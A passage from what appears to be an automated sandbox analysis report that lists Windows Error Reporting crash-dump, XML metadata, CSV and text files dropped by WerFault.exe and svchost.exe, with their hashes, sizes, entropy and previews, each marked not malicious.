SHA1:	697AF75B8098C009A2E8B731F9375E3E2AB320CC
SHA-256:	3BC8DB089B7A66C8BFCD70EB61992EFB90A2CDF4ED1A0EE61FA46A1E8522E702
SHA-512:	584C41759307C80A49F04C69D5A7217A6E495CFA2B295C989208A8F24D5CFD0B94DBCD0B9212F81F4AC4C7689603FA010EA338066E8AE5F0A2A737A063CA3165
Malicious:	false
Preview:	MDMP..a..... .........4f............................4.......$...........\|............L..*z..........l.......8...........T............+..f[..........h8..........T:..............................................................................eJ.......:......Lw......................T.............4f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CC5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6570
Entropy (8bit):	3.7357822710129334
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbPncmYxYZMKMkf7ZigaM4Uw89bVBDRf0QvHm:R6l7wVeJPncmY4M0xprw89bVBtf0oHm
MD5:	ED6D8275175546795FC05DE7DD5F287B
SHA1:	CEE5B38A444A6D2F1DE6D44B72E834BA7A17526D
SHA-256:	63A37069D89168CE5716816A36C94F9704F2D7F67CD194EBB4BB455FA9674414
SHA-512:	A672AFD911CF4D8BCD032BD96EF45EDFA26CC4F188074790B4BCAA91A244D3F94A9FCAF21F4013DB9D84DF6E753FFB38FDB60E7F16F76D9E6ED8F52E1FBCA6AC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CF5.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4746
Entropy (8bit):	4.4931151503691575
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg771I9rIWpW8VY/PYm8M4JCsG6Fsoyq85N9TyxGvqe0Md:uIjfaI7ch7V2SJCskou9yKqe0Md
MD5:	B6D44090967A5BB7F990C3DE1B61E6F2
SHA1:	5D8BC3455FDFAB0138D3BFABAD3631A3FE391D3D
SHA-256:	034B077C0F4077CBDD7D54DD9788874732F7D112FCB1BDBC9CB061B2DA20B171
SHA-512:	B4DD2E7A8D89709703E3945DF81B8E0A082518AD6E29062D2B250E4405E724F3CB14921AD7230F8FD5B6B412243B96893003AB9B2B9C5ED60109423CEBE36E40
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D41.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77208
Entropy (8bit):	3.026195018712333
Encrypted:	false
SSDEEP:	1536:sTlE8r96YrvqR2jXZLKokQUSVP+shHu6BzXVjwARle:sTlE8r96YrvqR2jXZLKokQUSVP+shHuV
MD5:	FE72CB797C5CA84E4FAFC69ACDE48B46
SHA1:	825A36E5EE86163CB4E0AA9B306321DFA0391837
SHA-256:	67B78FA114D830E7640361029A9F016DCCE48FBA150D2C955203E6EFEEC7BFBA
SHA-512:	DAF99F17D4E47BD1603F105CB8569DDD3E7ABE8909CB96116E274922D5F8B1909B972ECC62B50B3F875AD4685E6EABDE7A1F576F002FAD22EA8ECCA90CC7E1A2
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D90.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.683682907582788
Encrypted:	false
SSDEEP:	96:TiZYWSlu9HYcYNWYHXUYEZDVt8imE2oSCwzUB5amla1MY9JIwi3:2ZDjrpAUPamla1MY92wi3
MD5:	F6B918BF59B42F40DBE36A26A64A8F66
SHA1:	ECBE7DF6185C79DE63A682970E0990628E0248EB
SHA-256:	7A46043514402F9E4DFE612CBD19C3FC7ACCD3DAB239556FADD412B72491BC9F
SHA-512:	3C5079AFAC3BFF5542FE8F493008219423B1DADDD4D5B95302F4654E24F0B65D256807D9349ABD1A858D97F5EE8EC08347BBFAECDAB4B063B7CFB00522C05B90
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DAE.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Fri May 3 11:13:43 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	426668
Entropy (8bit):	3.3003807814012838
Encrypted:	false
SSDEEP:	6144:a+EvtKvcC3g/7ub9q1xm3QnqcEm0Ykd4joVX9d3rzdrjRsG:r1qmQn61
MD5:	F1F649ADB644B928FAB673D417A3484C
SHA1:	AA9F8E5EABEAF619857E5577C7145B08E47F605C
SHA-256:	470275585DDB0D5E7A261A2DEF89528C03553F2E064B7F807693588FD0A5FEB7
SHA-512:	F0AD9175DC2BFE5729B5B23AE2CDE5CB7AB223A0146D3C6C00CC9275247C929EB35C5BD04A1DB802DA8862774299ABA15B26D78EE5A1CFCBE78283AA37497819
Malicious:	false
Preview:	MDMP..a..... .........4f............................4.......$...4.......\|...X.......TL...z..........l.......8...........T............+..,W...........8...........:..............................................................................eJ......X;......Lw......................T.............4f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER231E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8582
Entropy (8bit):	3.7093303025917215
Encrypted:	false
SSDEEP:	192:R6l7wVeJQnr76YvYnHIgmf4M0xprr89baM+fBem:R6lXJQr76Ywogmf4MpaNfB
MD5:	93DE5771EA35C34248B44D120427B951
SHA1:	6DF3CD781366187F9546793E6A3BB3E13AAF02A4
SHA-256:	004F2E055E8279259492FF570B9CFBA939A35E171F1C1B56A5A34B3B50FB3E3B
SHA-512:	CFAD7D7853C21F931BDCB3C418C2E961ED0FB0CF5100E45F10EA853AB17BAC02B09057C7459BE7C5F6B2655807A295C410C635D1EE46DD55CED6C364A70BA990
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER237D.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4746
Entropy (8bit):	4.496593832836079
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg771I9rIWpW8VYGYm8M4JCsG6FSyq85N9tcuyxGvqeOMd:uIjfaI7ch7ViJCsKurcuyKqeOMd
MD5:	20A4520C72F994668D3839436522C35D
SHA1:	3029C6DA3A9FB158B9DE89BBE449743853F65815
SHA-256:	A3E7ECA4EAA1CA8971F550A50F7C3E330F6E471455AB16A5349ECA636162AB6B
SHA-512:	B974CA1307348599961F6E51EE995C6D342905C1A3EED94F76DBE5E1514284D423101352B61A1472866006D4DE4DDB0BC108C3947C9B0098783E692E79F759D1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31E4.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80980
Entropy (8bit):	3.0218305174224938
Encrypted:	false
SSDEEP:	1536:JbvSD8pYLkb0JNKXU2L69XM/so+EI5iCTrshOy6BToWmhpa/3buv:JbvSD8pYLkb0JNKXU2L69XM/so+EI5i7
MD5:	658BF1BE05079F790B866B856B2111C0
SHA1:	5A1D8E47B6FCA1999CB6E2A07C3E7863BB61ACFE
SHA-256:	AE9421A97F7A10BE5B02CAB3E4AC598D97F753CB1C8381745A777B938B6ACD59
SHA-512:	3C321ED6AF8137CD1770889FA291B0391C947EEC7615B13A320143E55EC0DA44E6608DA6DFFF8CE2F8BCF9706B112FCBAF13B6FF67A130B74AE7888295AE09FE
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3243.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6836101009489046
Encrypted:	false
SSDEEP:	96:TiZYW09Qh8vYlYFWaHTUYEZtwt8iDEF2hw9Taw1aplaDOZMA9yIBi3:2ZD0VS97GwaplaSMA9VBi3
MD5:	FAD37A9E5BF9E7683758F1CA9FAE4766
SHA1:	A330CA0514A17B0425903AF5120CD64FD778D954
SHA-256:	F52CE14902A0A8308F73816CB8CF46CC267E45C295F78F7421A470A146B8E135
SHA-512:	0E9766BE5E0A92760705D0997825144F9A041AAF2D9756326404C48050CEB2363DFE271D73CD329C17C412C8A8A0508B1637C475E07403928753E9363467FA78
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A3A.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Fri May 3 11:13:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	419146
Entropy (8bit):	3.238984029341113
Encrypted:	false
SSDEEP:	6144:i0TtGgJtqBA53QkwqvdmQYaQK4a4yRgmXzlu:/jqOQkwqfXz
MD5:	57E0BE5E1DA1195DF88C4DAE24471BB0
SHA1:	17A85A4F205A8AB973BB59725C7694DCE11DD37A
SHA-256:	0F707384BFD2BD0DAD72950E2D1FDFBE144627207BC48E8AD631E710F1505DFC
SHA-512:	14EFCDE04CB3D9EE1FC270C71388632EA0CAFC88822E4B63F15B3FAA416560BE5092CA924B988B8CB790C20D2BFF558F919268D4901EC656A0D8F3BFD31C35BD
Malicious:	false
Preview:	MDMP..a..... .........4f............................4.......$...4.......L...X........J...z..........l.......8...........T...........h*...:...........8...........:..............................................................................eJ......(;......Lw......................T.............4f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BC2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8600
Entropy (8bit):	3.697803315208351
Encrypted:	false
SSDEEP:	192:R6l7wVeJQbOTN6Y1cCF+FCgmfZ1Upro89beitfCDKm:R6lXJsIN6YuCF+FCgmfL8e4fCP
MD5:	A96B92245623989F74BEC782548381C1
SHA1:	17E7FED4D19C3B8EFDD768FA2D6CE837D68E6488
SHA-256:	6F76ED9A4EF70918835804A174B5EAB1459E7CFDEF719D82936A3B4ABC49EE9B
SHA-512:	668E6FE0F428F6DCD16A981814DC095F65815567A3C9CEE1D28A2723BF995A81C047570A61C618A06D8C47F3389592D228A593AA3615E43D95B8642BDAF3FFF6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BF2.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4801
Entropy (8bit):	4.490716544153939
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg771I9rIWpW8VY2Ym8M4JCsGE6Ftyq8v5GEsYyxGvqeyMd:uIjfaI7ch7VqJCsXqW5XsYyKqeyMd
MD5:	8DFF54C55A27993EDB33EE3855AA33B1
SHA1:	1A1DEF5993D5CAAFACA04F72805B7C54E8B7F1A7
SHA-256:	2AAC76041D450F6D086A54C5A6620AB89CB2EEB48D3FE883CEC8B7058746DAC2
SHA-512:	535F5796E3BD93BFBCE37488AD60E37B83FF79605CC7ED4FC54592978B4527FC61C70A9E5B0C66BAA3A9A5592AFC9533B70ECE400D17B8C3F7B406C0D8318644
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C04.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	79550
Entropy (8bit):	3.0228806628399663
Encrypted:	false
SSDEEP:	1536:lTIBZtJMLvsmqzFzLX7YBGoPdfiCo/iYOy6BToWmhpaSLubzlZq:lTIBZtJMLvsmqzFzLX7YBGoPdfiCo/i0
MD5:	DEC0BB8BC211984C6376DF50B79754C6
SHA1:	8D4F47FAF6A00F36C017CFEEF18E999572D5B058
SHA-256:	2600E60DB4FB50B0C25571BD2476AD73BEA0B9EA9D1649CBF2E52526136D2E25
SHA-512:	A7C0C283A8888108EFD2C46683EF4E620CDE5734881CD4957E31FBAF797DE27A6F26EDF15AE32935265E6C3DD08C8F5C6E3C25007BAB45E53EE7DEC23BA3184E
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t